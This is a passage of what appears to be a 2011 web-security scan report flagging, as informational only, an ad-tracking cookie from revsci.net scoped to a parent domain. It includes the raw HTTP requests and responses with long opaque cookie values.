zCv/5AKql/SGwGhvGmK59b8mI0H/s59fcnAaYsTRAh/Gk1GeYHUgEDvSZsuQUTI78KkJXzq/pYbk6qPpLWSRfYlS6a4UnXidqrhhMwnIUtmQk83pnjGzweIe9ifQhl0DW31nUdNKCg3kSOV2LuBbISDzIYDN2z9p906jF1FvxrD2xtzxTas48XslO7BtR/Lkh74WCTKmQ2TcR/80YXAs2x54Unx8/hxsRu+6b2TFgabOY74v0H6PliIbZ+0ydXPZvr6GGWt1iBTOoJfcT7e0r0Qe6ZToij8/lnbZLfV+uEDXOLuOPT+JdyEMvMsEn7HcvBF+lm6kNgTKN2N0+RLO2pzEjlrbHdcho1MyFF9RtXqkWiSYP1SK0Z1JpQawf1VOEyblQFx7TAFSHkDq5YarNx1BjiCNSpT4pkc8zWlMERLAj742CxFJcNA7+7bqXIMpeRazq3GjYvq1ZExQxa14EVX3zMvdLiL4537bQzTtImWwRFCeJp1vOWaNCtiBaCCjUkE2AoeBTuAe4c4yZkwslcIwpVDwPnAc3kKPZLY+Z993KEKoXrWe62waOFdM9UyBhhZ8eyiviPRdWN+n5QWZXB/ytQk/EE16yEod9zUfnImrZJQW9Ys8nMLoze9ggGLSwXkoCVW0jHGRYkBUzEn3w0mptRnwXBbU/Ng4L9wDqPV1VjFlj2eXdfBEd2SWiWEoWV6VePTqpTUUoOMH9nsKTy2BqAdM8+Ek6W3257M/WcT6RgFIYhPu9y3eoJOGdX0ulvPgicSTBr+v6691MMM3Rz/UjOBFtYVx3shMKNlsstRh3vd0jUAyZ6258m9TC3vzg4Mry01nPVr29HB6VUElrRvOKGL8L3qbFAhutUcO/UxXT8a1f+Bhn0sp4SoJzDjEp2cmrA6sxh0SZm33XoaXmH3bmvhnpJX401vQl6DH1RWGWhl6f3idkGtOok/Mk4AKZw1ruTMAbId9Eat5e7LdG4+YIdz+UghA39ntHpNv3FgpMH0DEwDClJszcizVL1xoXNjpyDlYFVaZN8VWoDHe8ueyeVUuvLZwNIkyVi6GZHodr4jdrYvXA+PsERFXEqNg49BAC8jJ6+hf3tGtMtpIavStGyayEm8pmgXnw2/dXLA58vkqaROPe/EhQVfRLBrpPtrP5LkdoyM9GtJD4W6ykqZgFFE6WIfcG3GJ03m55lU7HlWlxuXMSDj9oTnVA9DT33GFTIAc+OmYkGrvWKeQflFuagdRs4X42I5wKzsz9acFXUpmJvMuZy5z5LO2t2s+5TmrnpVq0KmuWhwNOQaYsN+7Romyg47j4nSP+0fpyhJKll1yPjWD9tHBkY+R0MUxDV9WvcFQ=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4jOhOHMMH/CFfyFZ5hD9CU6do67BSgtgzWLK0cp566K2jLwzIRCIvylf4jXnXP+nYXfLWPrrGpnpaNZYHJ1HHqZT8VuypYmSEFZqKHipd3aEwUhBo+mqE5zXET/h0klTCO9quapUf84+RmhVKJgALVfezSf6cGLHRLqvYIQjT0kZECrrMnXA61RhpDsiQy8dcK/k7n1qfz3YC3yT7etQaMISozANh3vt+h0w5Ovdc+9BKxyVFaO/wTDXwDhV1ddBUJ76LLVvrhhAtAVLDpe1QuW+7UWcc18GifYdM1blY9oSwaISLoiEnn9Wz6vPio3OQB1vIOCu3lM3HLnhiEc3h1+e16CEwmxW8MNE50h5hbd3zFCAa09+LTEEB1RTC3QIR16NfHLy3I3DPw2HO9V+T3KCfhRH7Rg8tutSR9MbJsLBQt7wRFY4b7pt+OSRflmO4pYi0UuQzePGvo19Y8IUuUV/zOjE1mQfOKK7DopTL+CsWEWUSJe8bpmC9Rd8/nTV2P/01Z63CBvueh2hEAMypvqNGRLM9cAA7yQ66kbISCTJfF8PdqmoFwvNb2+q/Q1Fi7eDooDJAAkg894vEe0b//ngn1SENv8WVi7s/QeaYOnEa55YqmlqyDzADnokGFhzq7R8gFjRjefRSiaq5PK0sTx2Mq3hqMi8kZ3QSboUD02pD6aTSPxlx7HptL76Cb3+302TH/EMRNaSGk9pll5Z3oocznWfi1sFhdN0pzfrnt5tG6R8eyHY6EP7re6Oy374; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:09 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMJZjpn3hepL5u85DdJSwns63EnKfX2nh8cWigJwgSuviYqkQXc89yvIeq9+M8WRtyXBOh9HXIAUS4g+2BN2COW4LBvc3ZVyH5QJHJ9JlA5kaOwaneDKCp6W6nRvKxjoLa+84C9EswWzlqVOZx3Pe+iT7uvOO2UmYgAIvXe2xeoUZXx7GgIX0hYmiAS1KK52oofEk69n+/2zO1WPujuU+nVEV6xlw3DA9vTuj2OXbf94Odr80dMBNmeAaMfnpuAg8XR3mEVTQemosaYLVED7cDgyGAFyV5jSqpmW2ZyPgafSd1iAX0Ez6Z45DWgSHO1alQm1K8I4b8/nwPzag42qICFBZDyl1zqzkL/iGAJt8X0iANCqb0G+3jwnnQkZ11WyWA+7hHnnytRYiyNq+ZP2WMVOznpi0bP1BZzgnwCI+neNQQ7yMtALEzl5AZBVftrS44LsIeH8Kv/qcjQYKB0ZWI88v+gaNLRVyeyrNPnFHb8SGftVF6qRffReEsI9/yM3HweOU6SwigjIT81Ff97T0Ftxpc5J7yeQTeILjgZWjaQnDihOjYx6885VNGtb7nQRPdxVQjL6M4DAu/5RO2vmeANOhYGYGMsbyuxCkriR4pziSXX67UTNKaIMwWnc06IQUPunqaV4UE8RvNq++Lpkrh9+1ZMeOMemnIrt3nFPjo6GDOGsLagycIEu3AIiM3kjZwsoHehLHdFkoPXjNOcg9G72o2vMzc1qYZRA2+zGgkfG8IziLRU0TNM++7tzhOU94r2SKPtrr68L6Eha1lGsbyV28/mjf+N7XhDL2n0eiJIpDgwzPSKaVkpFYnbK8WKz4dx4wCRADaanjv7gOcCF55UYjgRlJX/vNjHM6kWP9P8lCN6qMwfdHdJn4XNtJVdtcegph6wQ86wBERfribSPog6hU8XD8zOAV+X0NTXGvsPMlWrA6t2B+1aj5Np3h3J+RQfPxlm1xpHrTUwceZAQRgv3+6Y083L2UXZAxnZoo5jHRCe4UpAHFW3i4Ij5buFivhOoJ+61mUI6S3Y1LM84UcS84ZIfXkKhjf0ozZp1mYUEE2QGvOxbmrXFz/2IkSYgCXmXZTmPMkX+tFRct4/4yOCCgY4SMmhgrDi0+8lGx0CxL5lMNi4EbwIKTfFA+xsWwxLqbym/GHWjF2RqL1IIXGlNbS4MV+yRUV/BQsdepAb4mauU4GBCH2gNjzGFBtF5sHZtb0qbqMotK/Ad6qJ4nEFC13nkBu6QW3P4Au5oJQJP0qSM0YVXbbtq8mUBxf8ToEioahQIrPYjNOz1XIuPdNGO9pZ177Em8pstn02a04vRy4hUFFsbfkM8ricaS/vWyB09JBiM99JQdqgtkBdNXwwI4fxYPJuFsA8i8qJO3WL0xQ8OToYp4TOssG1giQRXBCOcuebW++WI8DImL69geiAN/Xu1TKkrChFhlZ2E4jTzgnA2NJHiEIMFqiD1GtNBCz1cFO9p9DSZjwdV1Vj677EGkwP5m2Z1knEBN1Jdis2oTIYhE7mwm9EWLOCmODdZtkBd9+rAdC5o3CttbVsMhClh1R4czt9np/0wuBinHRjpCo9fZp+AwfQGfIa5+Wz1yBM24afElvE+unPmmNYdrBiRTAHXc/pU4jTm/gHIt2BN7PofAeMT3yBhWsPDgjYgOtNXJBrwNcZt0bUuSJjcigK094nvOhdbcH4dYGoChnibu/Y96JzuyUL25IYblD299R/B11cNdwtI7cnEiJGWHve7Sxiv3IoWALmq30vTDzqO6qLBv3kL33URsedu+bv+n59ttgXFOLmwiPYbtIGk4I=; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:09 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Wed, 06 Jul 2011 14:01:09 GMT

GIF89a.............!.......,...........D..;

9.27. http://pix04.revsci.net/G10937/a4/0/0/0.302 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/G10937/a4/0/0/0.302

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4jmhOXMMH/C1v6FY5BD9CU6du67BSgvgzGDKYyViGy3JIntSYSCogy2dpq+vTNYcB2lBiDYquxbyc5KyKQd662VMvFJPv1Uq5+hEiNuMv1rrcc9IMSklF2Gl2leH2QScoPwA+qc3858Y0/EEUtJOb1lLVH7Jl7Qf05Ccm9I0A591R0ytDmk3/dhVjwiYtzytZlIJs1ik2IzzOBdpWnUkraZOkhZsuD2xFpH4bDNowwn1Mt6VN61EZkp2gq18WYyq/SwVfAgPacfnhGNoa0j2t6d0mKqWyDVTpo7MOHvpI6TY+rVFV0ctXwqwKtzHWcvOQB1vIOCq3gJbKRdOm8g5ervgtODIWCpKrzehFnf3uFwSbzJASDXKbvuyElRzC3QIB16NfHLy3I3DHw2HO9V+T/KCfhRH7Rg8tuvS6l9sIJ6bwWwyxkslqSob+BWyiSkct1E9Ls74UZqgkQVKs4e/XX/Cvi2KZJnZwugqUBC7SOgAIaDhyR5Dg8c/GsPevQXpUlriLOF4Et1lLKW9x3zc7WGaredOrZXJsBbxC1C7mN5tx6+Q1SUPA1gHY+f4H+VkKygKQ4CpXw31XbXpJItZ0B92GzzCcXVkAmiLUQSOYV1W/Xy3POJ+TzKnDfYSd8TU8zoIYLon5ZgAMALC/NMZCwDrluIvv94WuEX/TlfGa5341PraigX3lIAkpAbjmPB9q8wtyPoXTFON4tmbY3kWHTnleZLQfDfv64aXjU4vTZ/h45ksmfnshZDire56+37j; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:01:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /G10937/a4/0/0/0.302?tgt=http%3A%2F%2Fib.adnxs.com%2Fseg%3Fmember%3D514%26add_code%3D%7Bsegs%7D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUP94z+huXIMH/C1v6FY5BD9CU6duy5U1bkTIGbg2kQ6O500fvSx4UTo+UUZb5s27MU/gF1/ux7sGskdcPE/6idJLlUd7AAuXxxKy8BUcq3cPyLWWekcccnlFzHzZkpIVGfqfRixeJKIBCGYBys6pp34bnWBjoi4hWw0DEv8dZ1MKmhKcNVsgETg9Nxm9eUl2bYV4lz3F2qKGE4AQLEr2EpApywjvzC6ooxJGX2EpUDKZlDNGVCwlbwye561cEN0B95VelQaph/AIlLefSqhn5oCS/k/ffgQkvaHKwO3Hq2Jzt8Egb1MjdZhZUG2cS4+A/q9YkInuHps6t/FPHBFw5HhQo4/Cnazuco89WTgh/dG0NX2NzX9OHtWRemoBuTHV9Uzk58uZ3qvc/CWxOl0LVo6Mubh94RiFrR2pY2eUGuzMIfxqu1g5tF34x6XqpYBxymEeg7y5u6rHubC+TdBqemh88ANgsz6DyIi8PlIddeOxKdS38ycSBeL7ivCg9OcwKHelps5XFngUJ3CsZmV1D8+myaR+JjiRqTsZ5lwsaSdrB1ttygPM0cJVYaoJtMmveKTqltFKrTirU5KmpF8YBVx81cnIA2P6JaVmf2NK10qC7myMOpZ9M0P7sDNtMtyhoW8vaHg+DQsVRT4OB3V/8sMk/tMnEbNnGx1TV0N3YMAdxJkT99c4I4VazVkf7e8/iyP8wGSmzPUsD5yKdOMe1AeGm4f8IRVXN+eZ/iJtioCfSYznCj/ZRVHpQ8GtMbVwmql1/CQzDUY; rtc_Vpu9=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; rsiPus_TE1N="MLsXtTENJApvJ5EkOsXUOAMIrN7cVDsRAI1JlA2+kP2O+rpZrFxjRJpWO95J9jw2ez7PuZwvYpKzPZnmx73e3+g+RBhF6m2qS5qlx6y79pJEUaqR3iscgzeYYjYHE4zarxjYFkAK699GLRvC/lOpNi3oKjSDUjQz6bRd5RumVseON9retzHXthkJz7rmg/AoXcHq/5pWJqRHvxa4sjMtfKPaDQ33n2MzatS1JHKj3inoOBwKFOrUvo8YaYkbDBX35ir0cxEU/FuG0/p0o7qD+/iAZjMCOEMSy6LFwfP/J639cuKKTM9hCsXY7SRInhwCovfpF72sRVZjw87NKbbB5Qql0y6OOGyQHjmdqnB673xTTed/W8l8FYytBOFCjfyyAn+9fAsQpGJACvABUg65KeD2WZxuUkW8tcwRvHrD8CCkEjJAiJaJ82KVgPv/NORGeWc9yQYH8J8DvtXM30s4lrbgRaOIuDlgmpCQPyY96wRUB5WctGJ5ukZ+VdijEsGEXKuAkODAAvCZgyZdj8pk/yhkS0E5DWzwQNhbMQqx9ZcSOd2BRF73UX97YK9Y2LBhI5D5YdW6AxIcxgZ75K3YEm2jyg8wVYiegYI4koi6fjSUGpU/aclERWBbApHsM8wQvxy/xAjqz5YU6sjueUp2EQCgOSizhocs/l635dkgU41sM3QM4vfW+yqPZggnyj4CCBDgYunklnGSR1uUwhJ5hDMoOqLrb5l6iy7ocKWjGp4dHvAEKwJ9W7MtSY1f41qRjmHDNW9/r6Q8aJUKpTJDmtMSHptJB5b7H/DyCI9h2P2Jc53oHYsuhzMyCqTEHsZ1NHiZncWyXVikqCft8J5KWWMaHRDZJ4xrlnYbg9QbfDpW13lV2wfIa5JYPZCAicT6d7jumtyAidZ9MhQT3qWk+vU2eX/ch32cEA3iYr2o27vwbqcnfZMKtZLUqKawF9qclwanTscXsJVIuz+EFY2T/cgVP6dGTkX0PEfzwfQto1hHpBtSU+5CiN7tPVfU3EWnub4+QSFEOUm98aAA9rwkukyqI0H52kYMKTrOExsDgc4HCR3ZpaW/yqUqrkZtHgwrPXhRSgzmUynN1lnLdZIdNR1ojLIOQfdCYDd8YoVzuIGzZBAACC754kxcTZjDmurWrZoeWjI2k4sycb8WveRTIGNS0tCpCEnvVK6DRSZeRPZ94F89r62QMAUaW0jXDnDKORbKBvUUy2WvWoaGLHNMjts8k4qt7Pta2W9Yam9cirruDGatLKblpOHKBcIUQK0tZfcSJIXU/LdkOfqtbzkELtKtuTyGXEnQxPmL98WMjfKPjd9BbcZfBwr+okep4nH+ENdSMYVP/LRqrdQdRIpj3oIsiVfqfv5kuG3oAA0+UypOfQ/LDMyvu1OeQgp7zfqCKAW9gNK3JnMhNNyF2y+GB3/bTOyaIWb9WyJTQ6FZp0Lp4mbDTa0xbsVieWfPhWs1ui+rGo+GHkveFJJKHiuHlJ/yTOvZNAA4cv9yWcaSVCbV9gfI/liUeuPq30bAU6XE+IFUECA8aiAUIfwBYuEgbzMkZpqjj8XvpIGujHXxiCPL"; rsi_us_1000000="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"; udm_0=MLv3NzUNbjpr3hfhvURQO7bVnc3Latc29T4IRbcs6OIWwxvfrNL/DOg1H1jrVqpsW0lWW4HtqMd7E+Uk5EzwLMOJAF+KNwwvW70D8Wocb+lGcNYP/uVmI8EAnSaGIlLRuAZXx5ZGXJTbr4U67p6Nmptr4BJmF8czLH3P6CzlXoqpP/AqWqHnFiNetqPWOif4QVTii6uy+8fRFg3ceiBW4qlM/6vhrY47MwXPFbPvvHDJ3QtIInpUPLFKnoac2xOWgbaZU82eHi3DdXUTS9R4AV4RQ+dn9HWu9sMszBaK/WByvVshR4FnYfVtmSItAsfgC7n1tO1YdoHGVxupt/38v1DYoEvv8mHa1TNZXOYZ+PKeLqhyRjT5FA3BIAdkEnZeU/b8qRIXTPPZsXfV8y2DtD4UvHS2lhhVN7vY6Ktt8kn5aAEKM/sI99+4Y44sdqDU7C4U3d2buYp9bKOzrlZoJStEZTC9cMt4uOkwOQKq+HClC0YwpnRI+RYgR22ErSsIpamH8gzUv57gNxj4RxN8PSQE2dJBoo3wLtqLVA65yBuEzbCE5YZT2PoTFoYC7HUf+RwSGVqHLBAdy3gFEaxmYdMIaD/cSHi46fXLe8Cjx34VD2Dnbq+YzIx1JE79YKvGlEBJPPViqmJAVNOAwegES9AFZTsC9sJnl5s/497ONiFtBSEmn4BiuHzFLKi7C2XxRiPNqV43M7bWFYQbiYz8xbH7WZmvLZJ+AOlG3Onnnyp7Hun60z6duZ8H5kvJAhtuaeiWvgU9wvTIz3cVEmF3LyEq+82UmG2j5BtliZuLOFroZWYr2zZMhIjh3tRtrXkZ/OHSvr5pIXuALDryFTkD6hX9i3qpwcSXANiyjRhG5XfquJM7S1IVn5j5yMjNLu8F4sYckSt66B8yvYVRw8jGdneM5IbfudUCxODOmpoWr8Su2FC1VWHnp9AytRFYyurTGbz4ynHTH+6VBHucy+1Obxiyw/wr3P5mD7RcgSYmdkF/DP6xl9bfnuCKyKuEbayFkkugKbhXyjbt7s/ytyzvWlHmmdLGhoGSo9lVinKWjCWsFEri5fsT6dXcd3DW7m04GhQ9NEyv8t24u5It+hywVMh407VyvFxLQr57u+hn9oh5ofDZUEap/uQHWjyPmj4S+a8MI2yegIuSq7QdSHIrWfep30rYVOzJZjmGSKAvVDRboKmhRkdEpskBWY7ved+EVqqEWGcOc3C8Kv+hSFOnoB17n/vLB/syQK9dPGy6zteVAjqNB9pn7Bc4o69Bsl+A7aEM9AMHvhrZh1vYWw4MDoaIrA9dGLcL0oOBCKhgwBBud9MOP3gtaQaGIRoXzQV6uVZ2/A+XZpi1BfXB1BE6bMQnAhUUuepfy8RIuUGm6pvdxFeM8KVin+L3pLENGei3NaIGE2iMfLs8jv1fq1D5PwQcvMzZs541ABWbrQzmR0H2EbzvqdGh1bgNAPE0I4vZr+BIi5g1FtdHTv6wcjeLM87cvyYzgIw8R/rOr/b3cB3nexjtIQCAelIlihMTfWysxZ0wWajQI9JioKfrc93VMVDy/O2HDYKbKaIK6Zv0ETyvMG/dbRSDhPM7WaYxo71F/pCWlLROcSUg7tMtcwBVd8Bx+EolOzoSz8hgWe5977t7UZL/iigxbwAOJxt4S7Uw5MX207E1acWpPGo1OQfdvBhY5CXzA+xxh/MdxxFvAM4gGytM60RFkVDlezaEojWN+Xv9Ut+o+3U/QT8IWZfEyFNcQtoftGgpRslxCIHUtS8+Sr4d88ot8mjFZJ+35zhbkq4AIxADxJ1hvDzGng==

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
